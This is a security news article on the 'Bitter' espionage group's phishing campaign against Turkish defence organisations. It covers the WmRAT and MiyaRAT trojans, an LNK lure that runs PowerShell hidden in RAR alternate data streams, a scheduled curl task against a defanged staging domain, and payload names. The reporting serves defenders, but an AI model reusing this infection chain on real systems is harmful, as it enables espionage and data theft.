'Bitter' cyberspies target defense orgs with new MiyaRAT malware
A cyberespionage threat group known as 'Bitter' was observed targeting defense organizations in Turkey using a novel malware family named MiyaRAT.
MiyaRAT is used alongside the WmRAT malware, which is cyberespionage malware previously associated with Bitter.
Proofpoint discovered the campaign and reports that the new malware is likely reserved for high-value targets, deployed only sporadically.
Bitter is a suspected South Asian cyberespionage threat group active since 2013, targeting government and critical organizations in Asia.
In 2022, they were spotted by Cisco Talos in attacks against the Bangladeshi government, using a remote code execution flaw in Microsoft Office to drop trojans.
Last year, Intezer reported that Bitter was impersonating the Embassy of Kyrgyzstan in Beijing in phishing attacks targeting various Chinese nuclear energy companies and academics.
Abusing alternate data streams
The attacks in Turkey started with an email containing a foreign investment project lure, attaching a RAR archive.
The archive contains a decoy PDF file (~tmp.pdf), a shortcut file disguised as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and alternate data streams (ADS) embedded in the RAR file named "Participation" and "Zone.Identifier."
If the recipient opens the LNK file, they trigger the execution of PowerShell code hidden in the ADS, which opens the legitimate decoy PDF for distraction. At the same time, it creates a scheduled task named "DsSvcCleanup" that runs a malicious curl command every 17 minutes.
The command reaches a staging domain (jacknwoods[.]com) and awaits responses such as commands to download additional payloads, perform network reconnaissance, or steal data.
Proofpoint reports that a command to fetch WmRAT (anvrsa.msi) in the attack they examined was served within 12 hours.
The WmRAT and MiyaRAT malware
Bitter first deployed WmRAT on the target, but when it failed to establish communication with the command and control server, it downloaded MiyaRAT (gfxview.msi).
Both malware are C++ remote access trojans (RATs) that provide Bitter with data exfiltration, remote control, screenshot capturing, command execution (CMD or PowerShell), and system monitoring capabilities.
MiyaRAT is newer and generally more refined, featuring more advanced data and communications encryption, an interactive reverse shell, and enhanced directory and file control.
Its more selective deployment by Bitter may indicate that the threat actors reserve it for high-value targets, minimizing its exposure to analysts.
Indicators of compromise (IoCs) associated with this attack are listed at the bottom of Proofpoint's report, while a YARA rule to help detect the threat is available here.
New fake Ledger data breach emails try to steal crypto wallets
NVIDIA shares fix for game performance issues with new NVIDIA App
CVE-2025-22224 VMware ESXi and Workstation TOCTOU Race Condition Vulnerability
CVE-2020-29574 CyberoamOS (CROS) SQL Injection Vulnerability
CVE-2025-2783 Google Chromium Mojo Sandbox Escape Vulnerability
CVE-2022-43939 Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability
CVE-2024-49035 Microsoft Partner Center Improper Access Control Vulnerability
CVE-2022-43769 Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
CVE-2024-40890 Zyxel DSL CPE OS Command Injection Vulnerability
CVE-2025-24983 Microsoft Windows Win32k Use-After-Free Vulnerability
CVE-2017-0148 Microsoft SMBv1 Server Remote Code Execution Vulnerability
CVE-2024-20953 Oracle Agile Product Lifecycle Management (PLM) Deserialization Vulnerability
InformationalInformation Disclosure - Suspicious Comments
InformationalRe-examine Cache-control Directives
Free online web security scanner
